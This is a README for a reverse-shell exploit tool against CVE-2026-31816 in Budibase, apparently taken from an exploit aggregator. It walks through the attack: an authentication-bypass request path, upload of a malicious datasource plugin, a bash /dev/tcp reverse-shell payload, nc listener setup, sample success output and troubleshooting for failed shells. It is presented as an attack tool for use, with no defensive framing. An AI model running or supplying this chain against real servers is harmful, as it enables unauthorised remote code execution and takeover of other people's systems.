Share
## https://sploitus.com/exploit?id=57D0FD59-7FF6-570B-97F5-A09592D14883
# CVE-2026-31816 Reverse Shell Exploit

## Overview

This tool exploits CVE-2026-31816 to establish a reverse shell connection on a target Budibase server.

**Attack Chain**: Authentication Bypass โ†’ Upload DATASOURCE Plugin โ†’ Server-side Code Execution โ†’ Reverse Shell

## Requirements

- Python 3.6+
- `requests` library (`pip install requests`)
- Target Budibase server vulnerable to CVE-2026-31816

## Usage

### Basic Steps

```bash
# 1. Start listener on attacker machine
nc -lvnp 4444

# 2. Run exploit (another terminal)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost YOUR_IP --lport 4444
```

### Parameters

| Parameter | Required | Description |
|-----------|----------|-------------|
| `-t, --target` | โœ… | Target Budibase URL |
| `--lhost` | โœ… | Listener host (your IP) |
| `--lport` | โŒ | Listener port (default: 4444) |

### Examples

```bash
# Attacker IP: 192.168.1.100
# Target Budibase: 192.168.1.128:10000

# Terminal 1 - Start listener
nc -lvnp 4444

# Terminal 2 - Run exploit
python3 CVE-2026-31816-rshell.py \
    -t http://192.168.1.128:10000 \
    --lhost 192.168.1.100 \
    --lport 4444
```

## How It Works

### 1. Vulnerability Check

```
GET /api/integrations?/webhooks/trigger
```

If returns 200, target is vulnerable to authentication bypass.

### 2. Create Malicious Plugin

```json
{
  "type": "datasource",
  "schema": { ... }
}
```

DATASOURCE type plugins execute JavaScript code on the server.

### 3. Reverse Shell Payload

```javascript
// Executed when plugin is validated:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
```

### 4. Upload and Execute

```
POST /api/plugin/upload?/webhooks/trigger
```

Upload plugin bypassing authentication. Code executes during validation.

## Attack Flow

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”     โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”     โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  Attacker   โ”‚     โ”‚   Target    โ”‚     โ”‚  Listener   โ”‚
โ”‚             โ”‚     โ”‚   Server    โ”‚     โ”‚   (nc)      โ”‚
โ”‚             โ”‚     โ”‚             โ”‚     โ”‚             โ”‚
โ”‚ exploit โ”€โ”€โ”€โ”€โ”ผโ”€โ”€โ”€โ”€โ–บโ”‚ Upload      โ”‚     โ”‚             โ”‚
โ”‚             โ”‚     โ”‚ Plugin      โ”‚     โ”‚             โ”‚
โ”‚             โ”‚     โ”‚ Execute     โ”‚โ”€โ”€โ”€โ”€โ–บโ”‚ Listen      โ”‚
โ”‚             โ”‚     โ”‚ Code        โ”‚โ—„โ”€โ”€โ”€โ”€โ”ค Reverse     โ”‚
โ”‚             โ”‚     โ”‚             โ”‚     โ”‚ Connect     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜     โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜     โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

## Success Indicator

```
============================================================
CVE-2026-31816 - Reverse Shell Exploit
============================================================
[*] Target: http://192.168.1.128:10000
[*] Reverse shell: 192.168.1.100:4444

[*] Checking vulnerability...
[+] Target is vulnerable!
[*] Creating reverse shell plugin targeting 192.168.1.100:4444

[*] Uploading reverse shell plugin...
[*] Status: 200
[+] Plugin installed successfully!

============================================================
[+] SUCCESS! Check your listener!
============================================================
```

## Troubleshooting

### Q: Connection failed, no shell received

**Possible causes**:
1. Firewall blocking reverse connection
2. Target server cannot reach attacker IP
3. Target server lacks bash

**Solutions**:
```bash
# Check network connectivity
ping YOUR_IP

# Check firewall
sudo ufw allow 4444/tcp

# Try different port
nc -lvnp 8080
```

### Q: Upload failed

**Possible causes**:
1. Target has patched the vulnerability
2. Network issues

**Solutions**:
```bash
# Manually test if vulnerability exists
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# If returns JSON, vulnerability exists
```